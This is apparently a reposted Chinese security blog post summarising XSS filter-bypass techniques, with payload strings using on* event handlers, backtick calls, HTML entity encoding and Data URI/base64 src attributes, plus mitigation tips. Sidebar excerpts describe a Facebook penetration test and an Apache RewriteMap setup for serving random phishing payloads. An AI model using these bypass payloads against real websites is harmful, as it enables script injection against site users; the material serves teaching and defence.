【技术讨论】常见xss绕过小总结


第一类:<tag on*=*/>
在html标签事件中触发,典型的是on*事件,但是这种触发模式的缺陷在于不能直接触发所以更多的需要配合使用。
eg:
    1.使html元素占据整个显示页面 <a onclick="alert('1')" style="postion:fixed;width:100%;heith:100%"> </a>
    2.增加属性触发事件 <input onfocus="alert('1')" autofocus/>
    3.自动触发事件<body onload="alert('1')"></body>
在真实环境中,' 、" 、( 、) 都是属于黑名单中的成员,如果遇到以上四个字符被过滤的情况,那么我们就需要使用其他字符去代替,或者编码的方式去绕过。
eg:
    1.不使用 "  <input onfocus=alert('1') autofocus/>
    2.不使用 '  <input onfocus="alert(/1/)" autofocus/>
    3.不使用 ( )  <input onfocus="alert`'1'`" autofocus/>
    4.不使用 ' " ( ) <input onfocus=alert`1` autofocus/>
    5.使用html实体编码绕过 <input onfocus="alert('1')" autofocus/>
    6.使用html实体编码绕过变形 <input onfocus="&#97&#108&#101&#114&#116&#40&#39&#49&#39&#41" autofocus/>
这里如何修补该漏洞呢?常见修补方式有如下
eg:
    1.使用环境允许插入html标签排版的情况下,很常见的就是将html事件熟悉转义为html实体编码字符,当然也可以直接拦截返回404。常见匹配策略 /on[^=]*=/ig
    2.使用环境不允许插入html标签的情况下,不难看出所有的tag前面都紧贴着一个 " < " ,所以只需要将 " < " 使用html实体编码转换即可。常见匹配策略 /</g


第二类:<tag src=*/>
该类型的触发点其实相对较少的,曾经最经典的一个莫属于IE6中的 <img src="alert('1')"/> 但是这个问题已经成为历史,在其它tag中使用src属性触发xss的列子也还是有的。
eg:
    1.在iframe标签中加载一个脚本页面 <iframe src="./alert.html"></iframe>
    2.在script标签中加载一个脚本 <script src="./alert.js"></script>
在src属性中可以使用可以直接请求一个外部连接,还可以用Data URI scheme直接嵌入文本
eg:
    1.在iframe标签中使用Data URI scheme直接嵌入文本 <iframe src="data:text/html,<script>alert('1')</script>"></iframe>
    2.在script标签中使用Data URI scheme直接嵌入文本 <script src="data:text/html,alert('1')"></script>
使用Data URI scheme直接嵌入文本,比较繁琐,但是这类的好处在于可以使用BASE64编码格式
eg:
    1.在iframe标签中使用Data URI scheme直接嵌入BASE64编码后的文本 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+"></iframe>
    2.在script标签中使用Data URI scheme直接嵌入BASE64编码后的文本 <script src="data:text/html;base64,YWxlcnQoJzEnKQ=="></script>
在该类型的变形中还可以结合第一类的变形使用
eg:
    1.使用html实体编码URI <script src="./alert.js"></script>
    2.使用html实体编码Data URI scheme <script src="data:text/html,alert('1')"></script>
    3.使用html实体编码BASE64编码之后的Data URI scheme <script src="data:text/html;base64,YWxlcnQoJzEnKQ=="></script>
该类问题的修补策略和第一类类似。常见方式有如下。
eg:
    1.在允许使用外部元素的时候,鄙人不才没能想出处理方案。
    2.在不允许使用外部元素的时候,在src所指向的URI上加入当前网站的域名,以此限制内容为当前网站中的安全内容。
    3.在不允许使用元素引入的时候,但是允许插入html标签排版的情况下,指定tag白名单或者tag黑名单。
    4.不允许使用html标签的时候,将 < 转换为html实体编码。


本文想到哪里写到哪里,可能遗漏了一些地方,每个游览器特性不一样,针对性的bypass也有很多,可以专门找文章来看看,请大牛们多多包含。
最后感谢啤酒师傅,董师傅,李师傅,lcy师傅,Wan师傅们一直教我。。
勇爷 你咋那么多师傅
不错!虽然比较基础,但是好歹没啥客观上的错误。

技术交流QQ群: 397745473
来自:https://xianzhi.aliyun.com/forum/read/773.html?fpage=9

评论

发表评论

此博客中的热门博文

【漏洞研究】[渗透测试]滲透Facebook的思路與發現

图片
原文:http://devco.re/blog/2016/04/21/how-I-hacked-facebook-and-found-someones-backdoor-script/ 寫在故事之前 身為一位滲透測試人員,比起 Client Side 的弱點我更喜歡 Server Side 的攻擊,能夠直接的控制伺服器、獲得權限操作 SHELL 才爽 <( ̄︶ ̄)> 當然一次完美的滲透任何形式的弱點都不可小覷,在實際滲透時偶爾還是需要些 Client Side 弱點組合可以更完美的控制伺服器,但是在尋找弱點時我本身還是先偏向以可直接進入伺服器的方式來去尋找風險高、能長驅直入的弱點。 隨著 Facebook 在世界上越來越火紅、用戶量越來越多,一直以來都有想要嘗試看看的想法,恰巧 Facebook 在 2012 年開始有了 Bug Bounty 獎金獵人的機制讓我更躍躍欲試。 一般如由滲透的角度來說習慣性都會從收集資料、偵查開始,首先界定出目標在網路上的 "範圍" 有多大,姑且可以評估一下從何處比較有機會下手。例如: Google Hacking 到什麼資料? 用了幾個 B 段的 IP ? C 段的 IP ? Whois? Reverse Whois? 用了什麼域名? 內部使用的域名? 接著做子域名的猜測、掃描 公司平常愛用什麼樣技術、設備? 在 Github, Pastebin 上是否有洩漏什麼資訊? …etc 當然 Bug Bounty 並不是讓你無限制的攻擊,將所蒐集到的範圍與 Bug Bounty 所允許的範圍做交集後才是你真正可以去嘗試的目標。 一般來說大公司在滲透中比較容易出現的問題點這裡舉幾個例子來探討 對多數大公司而言," 網路邊界 " 是比較難顧及、容易出現問題的一塊,當公司規模越大,同時擁有數千、數萬台機器在線,網管很難顧及到每台機器。在攻防裡,防守要防的是一個面,但攻擊只需找個一個點就可以突破,所以防守方相對處於弱勢,攻擊者只要找到一台位於網路邊界的機器入侵進去就可以開始在內網進行滲透了! 對於 " 連網設備 " 的安全意識相對薄弱,由於連網設備通常不會提供 SHELL 給管理員做進一步的操作,只能由設備本身所提供的介...
阅读全文

【技术讨论】使用apache mod_rewrite方法随机提供payloads

图片
本文中讲述的方法更适用于真实渗透测试环境中,因为电子邮件钓鱼往往是威胁到整个公司,而不是只威胁到红队的测试环境。因为电子邮件钓鱼具有高针对性,并且手动设置攻击载荷对攻击来说也是很麻烦的。所以请阅读这篇文章,我会通过设置一个apache重定向器或者直接设置一个服务器,通过RewrieMap从预定义的攻击payload列表中随机选取payload进行提供。 apache中RewriteMap方法允许外部的程序比如脚本,数据库,文本文件等映射到服务器内部。在官方文档中使用最多的例子:如果一家网店的url结构想从item-1234到iphone-7-white,那么网站管理员无需更改任何硬编码的代码,只需当访问item-1234时,apache来提供iphone-7-white这一url。RewriteMap提供了大量修改这些资源的方法。我们会使用RewriteMap从一个文本文档中提取的payload转换为URI,并且当被访问时,进行302跳转,使目标能够访问到我们随机的payload文件。 下图就是攻击的主要内容: 环境配置 apache环境需要更改一些设置以便服务器环境支持mod_rewrite以及RewriteMap方法。这些设置的详细信息都在我之前的 一篇文章 中写过。长话短说,打开位于/etc/apache2/的apache2.conf文件,通过增加以下代码重写htaccess文件: <Directory /var/www/>         Options Indexes FollowSymLinks         AllowOverride None         Require all granted </Directory> 如果你的重定向器的网站根目录不是默认的/var/www,你需要去更改一下AllowOverride的响应目录。 在配置服务器的文档中,我们需要在底部添加: RewriteMap payloads "rnd:/var/www/payloads.txt" 这一行代码就告诉mod_rewrite方法,当我们使用RewriteMap调用payload变量时,就会从/var/www/payloads.txt提取。apache用户必须具有读取这一文件的权限。并且应该储存在w...
阅读全文